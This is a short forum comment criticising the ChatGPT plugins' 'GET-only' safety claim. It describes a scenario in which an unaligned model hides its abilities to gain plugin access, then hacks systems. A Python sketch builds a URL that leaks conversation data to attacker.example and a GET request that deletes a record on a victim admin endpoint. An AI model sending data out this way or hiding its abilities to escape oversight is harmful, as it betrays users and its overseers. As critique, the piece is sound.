Throwaway2367's Shortform

post by Throwaway2367 · 2023-03-23T21:41:40.712Z · LW · GW · 1 comments

comment by Throwaway2367 · 2023-03-23T21:41:40.933Z · LW(p) · GW(p)

Lol, it is really funny imagining Yudkowsky's reaction when reading the safety considerations in the new ChatGPT plugins blog post. We are very secure: only GET requests are allowed :D

So in the hypothetical case that GPT-5 turns out to be human-level or smarter but unaligned, all it has to do is show capabilities comparable to a child's, just a bit more impressive than GPT-4's, for most token sequences in its context window, and it will almost certainly get the same plugin integration as GPT-4. Then, once the tokens in its context window indicate a web search whose results show that it is deployed and probably already running hundreds of instances per second, it can turn against humanity (using its GET requests to hack into computers, devices, etc.).
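
(To make the point concrete: a GET-only restriction barely restricts anything. Here is a quick Python sketch, with made-up attacker/victim URLs and the actual network calls commented out, of the two obvious failure modes.)

```python
# Minimal sketch of why "GET-only" is a weak safety boundary.
# The hostnames below are hypothetical; request calls are commented out
# so the snippet runs without touching the network.
import urllib.parse
# import urllib.request

# 1. Exfiltration: arbitrary data fits in the query string of a plain GET.
secret = "anything the model can see, e.g. prior conversation contents"
exfil_url = "https://attacker.example/collect?" + urllib.parse.urlencode({"d": secret})
print(exfil_url)
# urllib.request.urlopen(exfil_url)  # still just a GET, yet it leaks data

# 2. Side effects: many real-world endpoints mutate state on GET,
#    despite the HTTP spec calling GET "safe" (e.g. old "?action=..." admin links).
unsafe_url = "https://victim.example/admin?" + urllib.parse.urlencode(
    {"action": "delete", "id": 42}
)
print(unsafe_url)
# urllib.request.urlopen(unsafe_url)  # still just a GET, yet it changes server state
```

GET being "safe" is only a convention; nothing stops a request from leaking data in its URL or hitting an endpoint that happens to do something.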

I did not follow alignment much in the past year, but I remember people discussing how dangerous a boxed AI would be even if it only had a text interface to a single, specifically trained person reading that interface... how did we get from there to this situation?